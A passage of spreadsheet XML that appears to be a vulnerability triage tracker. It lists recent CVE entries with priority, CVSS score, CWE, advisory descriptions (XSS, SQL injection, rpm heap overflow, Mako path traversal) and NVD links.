          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Page Builder by SiteOrigin &lt;= 2.36.0 versions.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97256</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97347</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The Post Views Stats Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin's only input filter is a substring blacklist for known bot signatures (e.g. 'bot', 'spider', 'crawler'), which can be trivially bypassed by crafting a User-Agent payload that omits those strings.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97347</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102395</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Easy Google Maps &lt;= 1.14.6 versions.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102395</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103242</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow flaw was found in rpm. RPMTAG_FILESIGNATURES in a crafted, unsigned RPM package's main header is declared with the wrong header type, causing hex2binv() to allocate a one-byte buffer and then write the tag's attacker-controlled, hex-decoded content — of attacker-chosen length — past the end of that allocation. This is reachable via rpm2cpio, rpm2archive, and rpm -qlvp on an untrusted package.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103242</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47602</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user can cause the driver to dereference an untrusted pointer. A successful exploit of this vulnerability might lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47602</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94081</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WordPress Persistent Login &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94081</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96816</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Trusted Shops Easy Integration for WooCommerce &lt;= 2.0.6 versions.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96816</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97237</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97237</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92873</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Pgpool-II contains an incorrect implementation of an authentication algorithm, which may allow an unauthenticated attacker to promote an arbitrary watchdog node to the leader node.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92873</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102135</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>On a Kiteworks Email Protection Gateway cluster with database replication enabled, a party trusted by the cluster could submit a crafted serialized object that was deserialized without sufficient validation, potentially allowing code execution as the gateway service account. Replication is disabled by default, and exploitation requires control of a trusted cluster peer or administrative access to the appliance.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102135</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102145</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could cause the server to issue requests to, and interact with, internal network services that are not meant to be reachable through this interface. On its own this did not result in code execution.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102145</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100279</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 changing an integration URL exposed its stored credentials</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100279</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102588</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The XML grade import feature lacks proper Cross-Site Request Forgery (CSRF) token validation. By tricking an authenticated user with grade management permissions into visiting a malicious webpage, an attacker can trigger unauthorized requests on the victim's behalf. This flaw allows a remote attacker to set or overwrite student grades without authorization.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102588</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102991</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Mako is a template library written in Python. Prior to 1.4.2, on Windows, TemplateLookup.get_template() in mako/lookup.py resolves template URIs with posixpath, while Template.__init__() in mako/template.py validates them with os.path, which uses ntpath. A URI beginning with a drive designator causes ntpath to absorb the traversal segments before the leading dot-dot check, while posixpath resolution can escape the configured template directory. An application that passes attacker-controlled template names or include paths can disclose process-readable files on the same volume, and a targeted file containing Mako template syntax may also be parsed and executed as a template. Raw URL paths are generally normalized before reaching this form, but query strings, form or JSON bodies, route parameters, and dynamic include expressions can preserve it. This issue is fixed in version 1.4.2.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102991</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103592</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>simple-php-router through 5.4.1.7 contains an IP restriction bypass vulnerability in the IpRestrictAccess middleware that allows remote unauthenticated attackers to bypass IP whitelist and blacklist protections. Attackers can spoof X-Forwarded-For, CF-Connecting-IP, or Client-IP headers to impersonate whitelisted addresses or evade blacklists, gaining access to IP-restricted routes.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103592</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16596</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>The WP Directory Kit plugin for WordPress is vulnerable to generic SQL Injection via the 'data_fields_list' parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16596</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67075</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>psirt@hcl.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
